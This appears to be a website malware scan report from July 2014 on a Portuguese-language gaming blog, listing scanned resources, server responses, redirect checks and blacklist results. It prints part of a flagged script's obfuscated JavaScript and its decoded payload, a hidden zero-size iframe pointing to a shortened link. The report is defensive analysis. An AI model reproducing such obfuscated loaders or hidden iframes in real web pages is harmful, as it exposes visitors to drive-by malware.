Scanned pages/files
| Request | Server response | Status |
http://rockgamesteam.blogspot.com.br/ | 200 OK Content-Length: 136428 Content-Type: text/html | clean |
http://baixartemplatesnovos.webs.com/script/resumopost.js | 200 OK Content-Length: 962 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=3.3.1 | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://dl.dropbox.com/u/73386157/codigos/minipopup/jquery.cookie.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Thu, 10 Jul 2014 10:08:14 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/73386157/codigos/minipopup/jquery.cookie.js Server: nginx Content-Type: text/html; charset=utf-8 | clean |
http://dl.dropboxusercontent.com/u/73386157/codigos/minipopup/jquery.cookie.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: Close Date: Thu, 10 Jul 2014 10:08:14 GMT Pragma: no-cache Location: https://dl.dropboxusercontent.com/u/73386157/codigos/minipopup/jquery.cookie.js Server: nginx Content-Length: 164 Content-Type: text/html; charset=utf-8 Set-Cookie: flash=; Domain=dropbox.com; expires=Thu, 10 Jul 2014 10:08:14 GMT; Path=/; httponly Set-Cookie: bang=; Domain=dropbox.com; expires=Thu, 10 Jul 2014 10:08:14 GMT; Path=/; httponly Set-Cookie: uc_session=GpSabuR9ohez4TKiidNgMrAlPlVZvdXi720rEjWoesZEv0Q4lZoOlWrdUpTvxpk7; Domain=dropboxusercontent.com; Path=/; secure; httponly | clean |
https://dl.dropboxusercontent.com/u/73386157/codigos/minipopup/jquery.cookie.js | 404 None Content-Length: 53 Content-Type: text/plain | clean |
http://dl.dropboxusercontent.com/test404page.js | 404 Not Found Content-Length: 53 Content-Type: text/plain | clean |
http://ib.adnxs.com/ttj?id=2141073&referrer=[REFERRER_URL] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:15 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2141073%26referrer%3D%5BREFERRER_URL%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=883812037561182847; path=/; expires=Wed, 08-Oct-2014 10:08:15 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2141073%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 1034 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?ttjb=1&bdc=1404986895&bdh=xYjUpNNk3ThH6lTDAjJVC3I1Ilc.'+c+'&id=2141073&referrer=[referrer_url] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:16 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1404986895%26bdh%3DxYjUpNNk3ThH6lTDAjJVC3I1Ilc.%27%2Bc%2B%27%26id%3D2141073%26referrer%3D%5Breferrer_url%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=1787511595940564042; path=/; expires=Wed, 08-Oct-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1404986895%26bdh%3dxyjupnnk3thh6ltdajjvc3i1ilc.%27%2bc%2b%27%26id%3d2141073%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 569 Content-Type: application/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12011 Content-Type: application/javascript | clean |
http://ib.adnxs.com/ttj?id=2141071&referrer=[REFERRER_URL] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:16 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2141071%26referrer%3D%5BREFERRER_URL%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=1539287541111181379; path=/; expires=Wed, 08-Oct-2014 10:08:16 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2141071%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 1034 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?ttjb=1&bdc=1404986897&bdh=zVpgy-veZ63zpa7XS5A1PhpIZ6E.'+c+'&id=2141071&referrer=[referrer_url] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:17 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1404986897%26bdh%3DzVpgy-veZ63zpa7XS5A1PhpIZ6E.%27%2Bc%2B%27%26id%3D2141071%26referrer%3D%5Breferrer_url%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=8813885236864116456; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1404986897%26bdh%3dzvpgy-vez63zpa7xs5a1phpiz6e.%27%2bc%2b%27%26id%3d2141071%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 561 Content-Type: application/javascript | clean |
http://ib.adnxs.com/ttj?id=2141072&referrer=[REFERRER_URL] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:17 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2141072%26referrer%3D%5BREFERRER_URL%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=8483669254704285848; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2141072%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 1034 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?ttjb=1&bdc=1404986897&bdh=zVpgy-veZ63zpa7XS5A1PhpIZ6E.'+c+'&id=2141072&referrer=[referrer_url] | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Thu, 10 Jul 2014 10:08:17 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1404986897%26bdh%3DzVpgy-veZ63zpa7XS5A1PhpIZ6E.%27%2Bc%2B%27%26id%3D2141072%26referrer%3D%5Breferrer_url%5D Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Fri, 11-Jul-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2168013014677094252; path=/; expires=Wed, 08-Oct-2014 10:08:17 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1404986897%26bdh%3dzvpgy-vez63zpa7xs5a1phpiz6e.%27%2bc%2b%27%26id%3d2141072%26referrer%3d%5breferrer_url%5d | 200 OK Content-Length: 562 Content-Type: application/javascript | clean |
http://baixartemplatesnovos.webs.com/script/pagenav.js | 200 OK Content-Length: 7683 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var agnesa="'1Aqapkrv'1G'2Cdwlavkml'02qjmurcegAmwlv'0:hqml'0;'5@tcp'02vjkqWpn'1Fjmog]rceg]wpn'1@tcp'02jvonOcr'1Flgu'02Cppc{'0:'0;'1@tcp'02vjkqLwo'1F3'1@tcp'02rmqvLwo'1F3'1@tcp'02kvgoAmwlv'1F2'1@tcp'02dDnce'1F2'1@tcp'02gDnce'1F2'1@tcp'02jvon'1F'05'05'1@tcp'02wrRcegJvon'1F'05'05'1@tcp'02fmulRcegJvon'1F'05'05'1@dmp'0:tcp'02k'1F2'0Armqv'1@rmqv'1Fhqml,dggf,glvp{'7@k'7F'1@k))'0;'5@tcp'02vkogqvcor3'1Frmqv,rw`nkqjgf,'06v,qw`qvpkle'0:2'0A3;'0;)rmqv,rw`nkqjgf,'06v,qw`qvpkle'0:01'0A0;'0;'1@vkogqvcor'1Fglam Decoded script: <iframe frameborder='no' scrolling='no' src='http://goo.gl/wlKDd' width='0' height='0'></iframe> Antivirus reports:
| ||
https://www.blogger.com/static/v1/widgets/2423294629-widgets.js | 200 OK Content-Length: 89624 Content-Type: text/javascript | clean |
http://baixartemplatesnovos.webs.com/script/pagenav1.js | 404 Not Found Content-Length: 10322 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rockgamesteam.blogspot.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Thu, 10 Jul 2014 10:08:05 GMT
ETag: "1ecd3027-e3d3-42d4-898f-8e9cb5a8ae53"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Thu, 10 Jul 2014 10:08:05 GMT
Last-Modified: Mon, 07 Jul 2014 12:49:00 GMT
Alternate-Protocol: 80:quic
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET / HTTP/1.1
Host: rockgamesteam.blogspot.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Thu, 10 Jul 2014 10:08:05 GMT
ETag: "1ecd3027-e3d3-42d4-898f-8e9cb5a8ae53"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Thu, 10 Jul 2014 10:08:05 GMT
Last-Modified: Mon, 07 Jul 2014 12:49:00 GMT
Alternate-Protocol: 80:quic
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: rockgamesteam.blogspot.com.br
Referer: http://www.google.com/search?q=rockgamesteam.blogspot.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rockgamesteam.blogspot.com.br
Referer: http://www.google.com/search?q=rockgamesteam.blogspot.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rockgamesteam.blogspot.com.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rockgamesteam.blogspot.com.br/
Result: rockgamesteam.blogspot.com.br is not infected or malware details are not published yet.
Result: rockgamesteam.blogspot.com.br is not infected or malware details are not published yet.